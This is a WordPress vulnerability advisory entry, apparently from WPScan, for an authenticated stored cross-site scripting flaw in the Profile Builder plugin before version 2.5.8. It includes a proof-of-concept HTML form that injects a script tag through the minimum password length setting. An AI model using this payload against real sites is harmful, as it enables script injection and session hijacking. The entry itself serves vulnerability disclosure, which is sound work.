WordPress Plugin Vulnerabilities
Profile Builder < 2.5.8 - Authenticated Stored Cross-Site Scripting (XSS)
Description
Stored Cross-Site Scripting (XSS) in field minimum password length.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wp/wp-admin/options.php" method="POST">
<input type="hidden" name="option_page" value="wppb_general_settings" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="a37f914f93" />
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=profile-builder-general-settings" />
<input type="hidden" name="wppb_general_settings[extraFieldsLayout]" value="default" />
<input type="hidden" name="wppb_general_settings[emailConfirmation]" value="no" />
<input type="hidden" name="wppb_general_settings[activationLandingPage]" value="" />
<input type="hidden" name="wppb_general_settings[loginWith]" value="usernameemail" />
<input type="hidden" name="wppb_general_settings[minimum_password_length]" value="8"><script>alert(1)</script>" />
<input type="hidden" name="wppb_general_settings[minimum_password_strength]" value="strong" />
<input type="hidden" name="action" value="update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 2.5.8 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
f3ci
Submitter website
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-03-10 (about 7 years ago)
Added
2017-03-15 (about 7 years ago)
Last Updated
2020-11-26 (about 3 years ago)
WPScan 